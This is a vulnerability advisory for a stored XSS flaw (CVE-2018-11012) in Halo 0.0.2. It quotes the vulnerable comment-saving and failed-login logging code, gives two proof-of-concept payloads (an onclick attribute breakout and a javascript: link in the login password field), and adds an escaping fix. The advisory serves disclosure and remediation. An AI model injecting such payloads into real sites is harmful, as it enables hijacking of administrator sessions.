ruibaby Halo 0.0.2 CVE-2018-11012 Stored XSS

Authors: Insh3ll    Risk: High

CVE: CVE-2018-11012    0day: XSS

0day-id: 0DAY-176169    Date: 2018-05-13

Description

ruibaby Halo 0.0.2 has stored XSS via the loginName and loginPwd parameters in a failed login attempt to AdminController.java.

Vulnerability code

comment.setCommentAuthorEmail(comment.getCommentAuthorEmail().toLowerCase());
comment.setPost(post);
comment.setCommentDate(new Date());
comment.setCommentAuthorIp(HaloUtil.getIpAddr(request));
comment.setIsAdmin(0);
commentService.saveByComment(comment);

Payload

a" onclick="alert(/xss/)

Second place

When a login attempt to the admin back end fails, the submitted username and password are written to the log table without any XSS filtering, and that log entry is rendered on the admin home page, resulting in a stored XSS vulnerability.

Vulnerability code

AdminController.java

try {
    User aUser = userService.findUser();
    ...
} catch (Exception e) {
    Integer errorCount = userService.updateUserLoginError();
    if (errorCount >= 5) {
        userService.updateUserLoginEnable("false");
    }
    userService.updateUserLoginLast(new Date());
    logsService.saveByLogs(new Logs(LogsRecord.LOGIN, LogsRecord.LOGIN_ERROR + "[" + loginName + "," + loginPwd + "]", HaloUtil.getIpAddr(request), new Date()));
    log.error("Login failed!:{0}", e.getMessage());
}

Payload

loginName=admin&loginPwd=admin<a href="javascript:alert(/xss/);">xss</a>
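The root cause in both places is the same: request-controlled strings (the comment author fields in the first place, loginName and loginPwd in the second) are persisted verbatim and later rendered into admin HTML. The following is an added example, not Halo's own code, showing the minimal fix at the point where the login log message is built: HTML-escape the untrusted field and stop recording the submitted password at all. The names escapeHtml and buildLoginErrorMessage are hypothetical helpers; the LOGIN_ERROR prefix stands in for LogsRecord.LOGIN_ERROR from the advisory. The same escapeHtml helper applies to the comment author name and e-mail in the first place.

```java
// Added example (not Halo's own code): escape attacker-controlled login
// fields before they are stored in an admin-visible log entry.
// escapeHtml and buildLoginErrorMessage are hypothetical helper names.
public class SafeLoginLog {

    // Escape the five characters that can break out of text or attribute
    // context when the stored value is later rendered into HTML.
    static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Hardened form of the message built in the catch block of the advisory:
    // loginName is escaped, and the submitted password is no longer recorded
    // (the vulnerable code wrote it to the log in clear text).
    static String buildLoginErrorMessage(String loginName) {
        // "LOGIN_ERROR" stands in for LogsRecord.LOGIN_ERROR.
        return "LOGIN_ERROR[" + escapeHtml(loginName) + "]";
    }

    public static void main(String[] args) {
        // Constructed input mirroring the advisory's second payload.
        String attackerName = "admin<a href=\"javascript:alert(/xss/);\">xss</a>";
        System.out.println(buildLoginErrorMessage(attackerName));
    }
}
```

Running the example shows the angle brackets and quotes replaced by entity references, so the admin page displays the attempted payload as literal text instead of an anchor element. Escaping at storage time is the narrowest patch for this advisory; the more robust fix is to render log entries through a template engine with output escaping enabled for that field, so that every value reaching the page is encoded regardless of which controller stored it.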
